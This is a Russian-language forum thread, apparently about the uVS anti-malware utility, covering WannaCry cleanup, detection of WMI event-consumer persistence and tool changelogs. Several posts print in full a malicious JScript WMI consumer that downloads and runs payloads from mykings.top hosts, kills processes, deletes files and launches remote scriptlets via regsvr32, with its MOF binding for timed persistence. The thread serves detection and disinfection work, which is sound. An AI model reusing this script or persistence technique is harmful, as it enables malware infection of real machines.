Перейти к содержанию

Recommended Posts

santy
25 минут назад, demkd сказал:

нашел кого цитировать xD

ну, или так:

Цитата

Сегодня (примечание: без объявления войны), 12 мая 2017 года, компании и организации из самых разных стран мира (включая Россию) начали массово сообщать об атаках шифровальщика Wana Decrypt0r, который также известен под названиями WCry, WannaCry, WannaCrypt0r и WannaCrypt.

Впервые вымогатель WCry был обнаружен еще в феврале 2017 года, но тогда он не произвел большого впечатления на специалистов. По сути, до сегодняшнего дня шифровальщик был практически неактивен, но теперь он получил версию 2.0 и использует SMB-эксплоит АНБ из инструментария, опубликованного ранее хакерской группой The Shadow Brokers.

https://xakep.ru/2017/05/12/wcry-ransomware-apocalypse/

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

как временная мера:

 

выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"

;uVS v4.0.2 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
OFFSGNSAVE
bp C:\WINDOWS\MSSECSVC.EXE
bl DB349B97C37D22F5EA1D1841E3C89EB4 3723264
bp C:\PROGRAMDATA\MHLNIUXMEKA934\TASKSCHE.EXE
bl 84C82835A5D21BBCF75A61706D8AB549 3514368
bp C:\USERS\PUBLIC\DESKTOP\@WANADECRYPTOR@.EXE
bl 7BF2B57F2A205768755C07F238FB32CC 245760
restart


перезагрузка, пишем о старых и новых проблемах.
------------

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
2 часа назад, santy сказал:

вот это мне кажется больше похоже на правду
"Сбербанк, МВД и МЧС заявили, что хакерам не удалось проникнуть через их системы защиты.«Все попытки вирусных атак на компьютеры были блокированы, заражению не подвергся ни один компьютер. Все интернет-ресурсы МЧС России работают в штатном режиме», — приводит ТАСС слова представителя ведомства."
Тут обычная проблема с дырой в винде, те кто был без надежных фаеров и полегли в очередной раз, ничему не учатся, хотя давно понятно что ходить в инет без железного (в виде роутера) и софтового фаера на машине мягко говоря глупо.
В данном случае и накладно, тем более что адреса для получения выкупа далеко не уникальны и надеяться на разблокировку путем откупа не приходится.
Да и обновляться таки нужно (в данном случае MS17-010 нужен как минимум), а не отключать автоматическое обновление или сидеть на устаревших осях.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd

С WMI проблема была в том что не просматривались все неймспейсы, исправил.
Проблема c FireFox и русскими именами пользователей в путях дополнений осталась... эти.... затейливый клоуны используют непонятную 4-х байтовую кодировку символов, когда время будет разберусь, с ходу я так и не понял что это и главное ЗАЧЕМ ЭТО?

---------------------------------------------------------
 4.0.3
---------------------------------------------------------
 o Улучшена функция поиска обработчиков WMI, теперь просматриваются все неймспейсы.

 

  • Upvote 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

demkd,

хорошо, тема с обработчиком событий в WMI опять всплыла.

и пока что здесь не решена.

https://forum.kasperskyclub.ru/index.php?showtopic=55590

может получиться на ней проверить.

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
11 минут назад, santy сказал:

может получиться на ней проверить.

эта версия точно должна видеть, обработчик скорее всего сидел в default неймспейсе, autoruns его просматривает, а uVS не просматривал.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

запросил образ от 4.0.3,

но

здесь и версия 4.0.2 видит его,


 

Цитата

 

Полное имя                  WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
Имя файла                   FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
Тек. статус                 в автозапуске
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Consumer_Name               fuckyoumm2_consumer
Consumer_Class              ActiveScriptEventConsumer
Consumer_ScriptingEngine    Jscript
Consumer_ScriptText         var toff=3000;var url1 = "http://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i < arr.length; i++) { t = arr.split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="http://wmi.mykings.top:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr.split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");
Filter_Name                 fuckyoumm2_filter
Filter_Class                __EventFilter
Filter_Query                select * from __timerevent where timerid="fuckyoumm2_itimer"
#MOF_Bind#                  
instance of __FilterToConsumerBinding
{
    Consumer = "\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=\"fuckyoumm2_consumer\"";
    Filter = "\\\\.\\root\\subscription:__EventFilter.Name=\"fuckyoumm2_filter\"";
};

#MOF_Event#                 
instance of __EventFilter
{
    Name = "fuckyoumm2_filter";
    Query = "select * from __timerevent where timerid=\"fuckyoumm2_itimer\"";
    QueryLanguage = "wql";
};

#MOF_Consumer#              
instance of ActiveScriptEventConsumer
{
    Name = "fuckyoumm2_consumer";
    ScriptingEngine = "Jscript";
    ScriptText = "var toff=3000;var url1 = \"http://wmi.mykings.top:8888/kill.html\";http = new ActiveXObject(\"Msxml2.ServerXMLHTTP\");fso = new ActiveXObject(\"Scripting.FilesystemObject\");wsh = new ActiveXObject(\"WScript.Shell\");http.open(\"GET\", url1, false);http.send();str = http.responseText;arr = str.split(\"\\r\\n\");for (i = 0; i < arr.length; i++) { t = arr.split(\" \"); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run(\"taskkill /f /im \" + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject(\"WbemScripting.SWbemLocator\");var service=locator.ConnectServer(\".\",\"root/cimv2\");var colItems=service.ExecQuery(\"select * from Win32_Process\");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption==\"rundll32.exe\")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get(\"Win32_Process\");var url=\"http://wmi.mykings.top:8888/test.html\",http=new ActiveXObject(\"Microsoft.XMLHTTP\"),ado=new ActiveXObject(\"ADODB.Stream\"),wsh=new ActiveXObject(\"WScript.Shell\");for(http.open(\"GET\",url,!1),http.send(),str=http.responseText,arr=str.split(\"\\r\\n\"),i=0;arr.length>i;i++)t=arr.split(\" \",3),http.open(\"GET\",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create(\"regsvr32 /s shell32.dll\");pp.create(\"regsvr32 /s WSHom.Ocx\");pp.create(\"regsvr32 /s scrrun.dll\");pp.create(\"regsvr32 /s c:\\\\Progra~1\\\\Common~1\\\\System\\\\Ado\\\\Msado15.dll\");pp.create(\"regsvr32 /s jscript.dll\");pp.create(\"regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll\");pp.create(\"rundll32.exe c:\\\\windows\\\\debug\\\\item.dat,ServiceMain aaaa\");";
};

                            

 

HOME-9BAC17A5E2_2017-05-13_19-03-52.7z

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
10 минут назад, santy сказал:

здесь и версия 4.0.2 видит его,

Потому что он в "subscription" неймспейсе, возможно копия и в default сидит, поэтому таки лучше использовать 4.0.3
по идее можно и в другие неймспейсы инсталлировать поддержку обработчиков и будет работать в каком-нибудь "microsoft", но до этого вирусописатели похоже еще не додумались, впрочем теперь уже без разницы, uVS будет видеть его и там.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Demkd

А как эта вся картинка целиком выглядит

Как всё работает - механика так сказать ?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

По поводу SHA1 для WMI

А, что если вычислять глобальный SHA1 по всем данным из Инфо.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

новый образ, спасибо ребятам с фанклуба ЛК.

 

Цитата

 

Полное имя                  WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
Имя файла                   FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
Тек. статус                 ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                            
Удовлетворяет критериям     
WMI_ACTIVESCRIPTEVENTCONSUMER(CONSUMER_NAME ~ FUCKYOUMM2_CONSUMER)(1) [delall (0)]
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Namespace                   \\.\root\subscription
Consumer_Name               fuckyoumm2_consumer
Consumer_Class              ActiveScriptEventConsumer
Consumer_ScriptingEngine    Jscript
Consumer_ScriptText         var toff=3000;var url1 = "http://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i < arr.length; i++) { t = arr.split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="http://wmi.mykings.top:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr.split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");
Filter_Name                 fuckyoumm2_filter
Filter_Class                __EventFilter
Filter_Query                select * from __timerevent where timerid="fuckyoumm2_itimer"
#MOF_Bind#                  
instance of __FilterToConsumerBinding
{
    Consumer = "\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=\"fuckyoumm2_consumer\"";
    Filter = "\\\\.\\root\\subscription:__EventFilter.Name=\"fuckyoumm2_filter\"";
};

#MOF_Event#                 
instance of __EventFilter
{
    Name = "fuckyoumm2_filter";
    Query = "select * from __timerevent where timerid=\"fuckyoumm2_itimer\"";
    QueryLanguage = "wql";
};

#MOF_Consumer#              
instance of ActiveScriptEventConsumer
{
    Name = "fuckyoumm2_consumer";
    ScriptingEngine = "Jscript";
    ScriptText = "var toff=3000;var url1 = \"http://wmi.mykings.top:8888/kill.html\";http = new ActiveXObject(\"Msxml2.ServerXMLHTTP\");fso = new ActiveXObject(\"Scripting.FilesystemObject\");wsh = new ActiveXObject(\"WScript.Shell\");http.open(\"GET\", url1, false);http.send();str = http.responseText;arr = str.split(\"\\r\\n\");for (i = 0; i < arr.length; i++) { t = arr.split(\" \"); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run(\"taskkill /f /im \" + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject(\"WbemScripting.SWbemLocator\");var service=locator.ConnectServer(\".\",\"root/cimv2\");var colItems=service.ExecQuery(\"select * from Win32_Process\");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption==\"rundll32.exe\")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get(\"Win32_Process\");var url=\"http://wmi.mykings.top:8888/test.html\",http=new ActiveXObject(\"Microsoft.XMLHTTP\"),ado=new ActiveXObject(\"ADODB.Stream\"),wsh=new ActiveXObject(\"WScript.Shell\");for(http.open(\"GET\",url,!1),http.send(),str=http.responseText,arr=str.split(\"\\r\\n\"),i=0;arr.length>i;i++)t=arr.split(\" \",3),http.open(\"GET\",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create(\"regsvr32 /s shell32.dll\");pp.create(\"regsvr32 /s WSHom.Ocx\");pp.create(\"regsvr32 /s scrrun.dll\");pp.create(\"regsvr32 /s c:\\\\Progra~1\\\\Common~1\\\\System\\\\Ado\\\\Msado15.dll\");pp.create(\"regsvr32 /s jscript.dll\");pp.create(\"regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll\");pp.create(\"rundll32.exe c:\\\\windows\\\\debug\\\\item.dat,ServiceMain aaaa\");";
};


 

                           

HOME-9BAC17A5E2_2017-05-13_19-26-30.7z

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

Сейчас открыл: C:\WINDOWS\system32\wbem

там, есть: C:\WINDOWS\system32\wbem\AutoRecover   с файликами

А не может так получиться, что мы запись удалим...

А она возьмёт и AutoRecover...

И я бы всё таки посмотрел: C:\WINDOWS\system32\wbem\Framework

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

Сравнил выше приведённые скрипты.

Версия: 4.0.3 содержит дополнительную запись:

25 минут назад, santy сказал:

Namespace                   \\.\root\subscription

Которой нет в: 4.0.2

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
1 час назад, PR55.RP55 сказал:

Как всё работает - механика так сказать ?

я ссылки давал на msdn там все расписано что и как.
 

1 час назад, PR55.RP55 сказал:

А, что если вычислять глобальный SHA1 по всем данным из Инфо.

В данный момент это не имеет смысла.

14 минут назад, PR55.RP55 сказал:

Которой нет в: 4.0.2

Да, теперь указывается неймспейс,  но в след версиях я думаю я его перенесу в путь до объекта.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55
18 минут назад, demkd сказал:
1 час назад, PR55.RP55 сказал:

А, что если вычислять глобальный SHA1 по всем данным из Инфо.

В данный момент это не имеет смысла.

В системах есть _постоянные легальные записи с фиксированным именем и содержимым.

Расчёт  общей суммы ( глобального ) SHA1 для : Инфо.

как раз и позволит создать уникальный идентификатор.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
7 часов назад, PR55.RP55 сказал:

В системах есть _постоянные легальные записи с фиксированным именем и содержимым.

1 штук.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd

Что там за кодировку использовали клоуны из мозиллы я так и не нашел, но декодер сделал, будет ли декодировать что-то отличное от кириллицы я не знаю, проверять желания нет.

---------------------------------------------------------
 4.0.4
---------------------------------------------------------
 o Исправлена ошибка в функции анализа расширений Firefox.

 o Добавлена поддержка кириллицы в пути до расширения Firefox.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55
В 11.05.2017 at 11:18 PM, demkd сказал:
В 11.05.2017 at 9:01 PM, PR55.RP55 сказал:

Такие объекты сразу должны попадать в подозрительные.

это да.

В новых версиях я этого не вижу.

Demkd

А вообще есть какой - то блокнот\планировщик, чтобы всё - всё помнить ?   :(

:)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

Даже и не знаю...

-------------

Полное имя                  C:\USERS\ADMIN\DOWNLOADS\UVS_LATEST.ZIP
Имя файла                   UVS_LATEST.ZIP
Тек. статус                 [Запускался неявно или вручную]
                            
Сохраненная информация      на момент создания образа
Статус                      [Запускался неявно или вручную]
Размер                      3387073 байт
Создан                      15.05.2017 в 16:42:45
Изменен                     15.05.2017 в 16:43:00
Цифр. подпись               Отсутствует либо ее не удалось проверить
                            
Доп. информация             на момент обновления списка
CmdLine                     "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\Admin\Downloads\uvs_latest.zip"
SHA1                        C690C80CFD215299BCAE4E28DAC99467A64B51C6
MD5                         1DDB17583AD3E710A5ECEA5B7AC19285
                            

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
alamor
14 часов назад, PR55.RP55 сказал:

Даже и не знаю...

Тоже  заметил в последнее время много подобных файлов, которые раньше вроде не выводились.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

demkd,

посмотри, чем может быть вызвано это сообщение в логе? проблема была в скриптах WMI, но ему судя по сообщению почистили этот скрипт руками, а образ был сделан уже после всех очисток.

Цитата

Анализ автозапуска...
(!)WMI Error: CoInitializeEx failed!
(!)WMI Error: CoInitializeEx failed!
(!)WMI Error: CoInitializeEx failed!
(!)WMI Error: CoInitializeEx failed!

образ здесь:

МАКСИМ-ПК_2017-05-21_16-08-54.7z

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Посмотрел образ и мне мысля пришла...

А, что если рассчитывать SHA1 не только для файлов\объектов но и для  cmd и аналогичных записей.

типа:

"C:\Program Files\Common Files\Doctor Web\Scanning Engine\dwantispam.exe" -pipe:ASServer.Dr.Web -path:"C:\Program Files\Common Files\Doctor Web\Scanning Engine\\"

Таким образом можно автоматически определить легальна данная запись, или нет.

К примеру в системе\образе есть некий объект - его SHA1 нет в базе проверенных но для его деятельности:  команда\ы легальны и есть в базе...

т.е. Такой гибкий способ проверки.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

Может быть рассчитывать не именно SHA1 - а некий его аналог = идентификатор.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
4 часа назад, santy сказал:

посмотри, чем может быть вызвано это сообщение в логе? проблема была в скриптах WMI, но ему судя по сообщению почистили этот скрипт руками, а образ был сделан уже после всех очисток.

Гляну.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd

---------------------------------------------------------
 4.0.5
---------------------------------------------------------
 o Добавлен вывод ошибок инициализации com-интерфейса.

 o Добавлен фильтр на расширения в функцию анализа параметров запуска.

 o При сканировании списка по F3/F7 статус подозрительного файла получают все исполняемые файлы с нестандартными расширениями.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Создайте учетную запись или войдите, чтобы комментировать

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Сообщения

    • Ego Dekker
    • ArktiTig
      Арктика - северная полярная область Земли, включающая окраины материков Евразии и Северной Америки, почти весь Северный Ледовитый океан с островами и прилегающие к нему части Атлантического и Тихого океанов. Название её происходит от греческого слова arctos (медведь) и связано со звёздами: Полярная звезда, находящаяся почти точно в зените над Северным полюсом, принадлежит к созвездию Малая Медведица.
    • ArktiTig
      Арктика - северная полярная область Земли, включающая окраины материков Евразии и Северной Америки, почти весь Северный Ледовитый океан с островами и прилегающие к нему части Атлантического и Тихого океанов. Название её происходит от греческого слова arctos (медведь) и связано со звёздами: Полярная звезда, находящаяся почти точно в зените над Северным полюсом, принадлежит к созвездию Малая Медведица.
    • PR55.RP55
      .xml  файлы taskschd.msc Могут быть подписаны  цифровой подписью. Думаю будет нелишним, если uVS будет это фиксировать. т.е. проверять не только подпись целевого файла, но и подпись самого файла\задачи. и писать в ИНфО .  
    • demkd
      ---------------------------------------------------------
       4.15.2
      ---------------------------------------------------------
       o Исправлена ошибка при работе с образом автозапуска.
         Для некоторых процессов команда unload не добавлялась в скрипт при нажатии кнопки "принять изменения".  o Добавлена плашка окна на таскбаре для окна удаленного рабочего стола.
         (при работе с удаленной системой) -----------------------------------------------------------
      Есть проблема с локализацией глюка в редких случаях приводящему к аварийному завершению uVS при активном флаге "Проверять весь HKCR".
      На основе дампов его найти не получается, нужна копия реестра системы с такой проблемой, если кому-то попадется такая проблема, то присылайте архив с копией реестра системы мне на почту.  
×